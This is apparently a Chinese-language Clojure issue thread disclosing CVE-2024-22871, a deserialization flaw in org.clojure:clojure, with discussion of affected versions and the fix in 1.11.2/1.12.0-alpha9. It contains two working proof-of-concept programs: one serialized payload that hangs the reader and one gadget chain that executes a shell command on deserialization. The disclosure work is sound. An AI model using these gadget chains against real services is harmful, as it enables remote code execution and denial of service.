安全问题：通过反序列化在 org.clojure:clojure 中的 Denial of Service 和命令执行

Question

报告漏洞

在 org.clojure:clojure 中存在一些如下漏洞：
- 拒绝服务攻击 ( clojure 版本 1.2.0 - 1.12.0 )

• 命令执行 ( clojure 版本 1.9.0 - 1.12.0 )

请注意，此漏洞无需额外组件。

详细信息
1.12.0-a5 版本中的 RCE CallGraph

CVE
- CVE-2024-22871

Comments

如以下讨论中所述，拒绝服务攻击可能影响 1.2.0-1.12.0，而带有本地验证的命令执行可能影响 1.9.0-1.12.0。

---

我认为，目前存在的一些问题与以下情况类似，但采用了新的绕过方式。


https://clojure.atlassian.net/browse/CLJ-2204

---

我不明白，既然都是Java，Clojure与这有什么关系呢？

更新：我正确理解了吗？在Java中不使用Clojure也能实现相同的功能吗？

---

没有正确实现，函数调用图部分依赖于Clojure，例如apply、RestFn等。在Clojure的版本1.9.0-1.12.0中（在clojure版本poc中），可以通过访问匿名函数类来执行命令以获得$fn_5920。

Answer 1

在不受信任的数据上使用ObjectInputStream固有其危险性，就像该类的文档中所说的那样。为什么提供一些所用类的一个JAR的该类危险性的展示被认为是在JAR中的一个漏洞呢？

更容易让未来读者复现的方法

(let [out (java.io.ByteArrayOutputStream.)
      obj-out (java.io.ObjectOutputStream. out)
      i (iterate identity nil)]
  (doto (-> i (class) (.getSuperclass) (.getDeclaredField "_hash"))
    (.setAccessible true)
    (.set i (int 1)))
  (.writeObject obj-out (java.util.HashMap. {i nil}))
  (println "Writing is done. Reading...")
  (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
        obj-in (java.io.ObjectInputStream. in)]
    (.readObject obj-in)
    (println "Will never be printed.")))

Comments

是的，ObjectInputStream确实引入了潜在的安全风险。但是，关于这个特定的漏洞，问题并不是讨论导致安全问题的潜在风险。它在于，在1.12.0-alpha5版本中，可以构建一个特殊的序列化数据包，这加剧了这些风险的潜在危害。这可以不依赖其他依赖完成，并允许命令执行（看起来process:start是一个新引入的功能）。反序列化的危害通常取决于项目环境，但这个漏洞不需要任何其他依赖，是与JAR包本身相关的问题。

---

我明白了。但是，这与1.12.0-alpha5无关 —— 我刚刚添加到我答案中的代码也可以在1.8.0上运行以重现该行为。经过轻微修改，它可以在1.2.0上运行（但在1.2.0之前不行，因为在此之前clojure.lang.Cons是不可序列化的）。

---

是的，这个漏洞仅影响1.12.0-alpha5版本。我对之前版本的分析并不多，而且我对它们有其他高风险的反序列化漏洞感到悲观。
顺便说一句，如果可能的话，希望开发者能发布CVE，尽管我提出了CVE的请求，但我还没有收到回复。

---

你虽然是说“是”，但写的是与我所说相反的内容——这个漏洞影响从1.2.0开始的所有Clojure版本。

---

真的是这样吗？大家是指的是这个反序列化导致的命令执行漏洞吗？因为我对Clojure不太熟悉，我都是从自己的程序分析工具中获取到的这个分析结果。

---

还有，我最困惑的是core$partial$fn__5920类的生成原理。我使用soot分析了clojure.jar，但我希望了解Clojure中core$partial$fn__5920的实际代码。

---

这个具体的类是由`partial`函数的这个形式参数生成的：[链接](https://github.com/clojure/clojure/blob/master/src/clj/clojure/core.clj#L2638)

---

谢谢。由于时差，之后可能难以及时回复。

---

生成执行攻击命令的另一种方法

```clojure
(ns poc.clojure.command
  (:import (clojure.lang PersistentQueue)
           (java.util HashMap ArrayList))
  (:require clojure.java.process))

(defn set-private-field [obj field-name value]
  (let [field (-> (.getClass obj)
                  (.getDeclaredField field-name))]
    (.setAccessible field true)
    (.set field obj value)))

(defn modify-and-process-model [iterate]
  ;; 创建 PersistentQueue
  (let [model (PersistentQueue/EMPTY)]
    ;; 使用 set-private-field 修改 model
    (set-private-field model "f" iterate)
    ;; 返回修改后的 model
    model))

(defn main []
  ;; 创建 HashMap
  (let [map (HashMap.)
        args ["open" "-a" "calculator"]
        ;; 使用 ns-resolve 获取 start 函数并使用 partial 创建部分应用函数
        fn_start (ns-resolve 'clojure.java.shell 'sh)
        partial-fn (partial apply fn_start)
        ;; 使用 clojure.core/iterate 创建 iterate 实例
        iterate-instance (iterate partial-fn args)]

    (let [model (modify-and-process-model iterate-instance)]
      (set-private-field model "_hash" (int 1))
      (.put map model nil)
      (set-private-field model "_hash" (int 0)))

    ;; 序列化 map
    (let [out (java.io.ByteArrayOutputStream.)
          obj-out (java.io.ObjectOutputStream. out)]
      (.writeObject obj-out map)
      (println "Writing is done. Reading...")

      ;; 反序列化
      (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
          obj-in (java.io.ObjectInputStream. in)]
        (.readObject obj-in)))
    )
  )

  ;; 调用 main 函数
(main)
```

---

需要注意的是，只需将 'fn start (ns-resolve 'clojure.java.shell 'sh)' 设置后，它就可以影响 1.9.0 - 1.12.0 版本，并且可以实现命令执行。

---

我不太清楚您最后一句话的意思。`clojure.java.shell`命名空间中的`sh`函数用于执行命令，当然您可以用它来运行东西。命令执行机制仍然依赖于`Iterate`类实现哈希的方式。

---

这是因为在先前的版本中我使用的是进程启动命令，但遗憾的是 This is the new function introduced in 1.12.0.之后，我在项目中检查发现可以直接使用shell函数来执行命令。是的，哈希计算中的问题仍然存在。

---

这个问题已在1.11.2和1.12.0-alpha9版本的`Iterate hashCode()`中解决。